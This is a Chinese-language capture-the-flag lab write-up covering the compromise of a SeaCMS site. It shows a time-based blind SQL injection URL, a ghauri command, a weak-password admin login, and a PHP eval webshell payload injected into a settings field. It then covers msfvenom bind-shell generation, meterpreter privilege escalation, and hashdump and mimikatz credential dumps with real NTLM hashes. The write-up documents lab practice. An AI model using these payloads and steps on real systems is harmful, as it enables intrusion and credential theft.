CyberStrike Lab [PT-1] WriteUp

Flag1

信息收集发现网站指纹为 海洋CMS SeaCMS ,用 Wavely 扫描出了一个注入。


查看 poc 发现注入点为 http://10.0.0.68/js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(4)))v)&type=list ,是个时间盲注,丢给 ghauri 是可以自动跑的。

ghauri -u  'http://10.0.0.68/js/player/dmplayer/dmku/?ac=del&id=*&type=list' --dbs

但是耗时太长了,列出 5 张表名耗时大概得 20 分钟,如果是普通挖洞可以跑,但是对做题来说应该不是常规解法。

扫目录发现了 PhpMyAdmin ,但是没扫出已知漏洞,弱口令和空密码也没有。其他虽然也有一些目录遍历的点,但是感觉没有什么利用的思路,也没有泄露出配置信息,估计得审下代码才行。

但是最主要的后台目录一直扫不出来,找了好久才发现网站的 title 是 cslab ,先入为主以为每个 lab 的 title 都是这个,没想到是提示点,直接访问 http://10.0.0.68/cslab 就到后台了,之后就是用户名 cslab 密码 cslab 弱口令一把梭进后台。

之后就可以到网上找一些已知的 1Day 后台 GetShell 了。

参考 这篇文章 提到的后台 GetShell ,在 拓展 -> 百度推送 里面把 准入密钥: 设置为 ";eval($_REQUEST[6]);// 并提交,写入 WebShell ,访问 http://10.0.0.68/data/admin/ping.php?6=phpinfo(); 发现可以命令执行。

用蚁剑连 http://10.0.0.68/data/admin/ping.php 成功 GetShell ,其中 flag.txtC:/ 根目录下。

Flag2

提权不是很懂,参考 这篇文章 的方法进行操作,可以成功提权。

# msf 生成正向连接木马
msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=4444 -f exe > shell.exe

shell.exe 上传并运行,使用 MSF 连接。

V@Virts-MacMini.local workspace msfconsole                                                                                                                                                                                                                                                                                                                                         (base)

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set rhost 10.0.0.68
rhost => 10.0.0.68
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > run
[*] Started bind TCP handler against 10.0.0.68:4444
[*] Sending stage (203846 bytes) to 10.0.0.68
[*] Meterpreter session 1 opened (172.16.233.2:60932 -> 10.0.0.68:4444) at 2025-04-28 23:25:50 +0800

meterpreter > getsystem
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cad8ef0c410c9709cea512052756ce5a:::
ApacheUser:1000:aad3b435b51404eeaad3b435b51404ee:01ef84bcd8079831f0966ac49ae9c0e6:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds_all
[!] Not running as SYSTEM, execution may fail
meterpreter > getsystem
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username       Domain           NTLM                              SHA1
--------       ------           ----                              ----
Administrator  WIN-S4KAS0ERCGQ  cad8ef0c410c9709cea512052756ce5a  947e1029f3fc1ce2f1f6592a1e55844dd3152ea2

wdigest credentials
===================

Username          Domain           Password
--------          ------           --------
(null)            (null)           (null)
Administrator     WIN-S4KAS0ERCGQ  (null)
WIN-S4KAS0ERCGQ$  WORKGROUP        (null)

kerberos credentials
====================

Username          Domain           Password
--------          ------           --------
(null)            (null)           (null)
Administrator     WIN-S4KAS0ERCGQ  (null)
win-s4kas0ercgq$  WORKGROUP        (null)

成功获取 NTML Hash cad8ef0c410c9709cea512052756ce5a

评论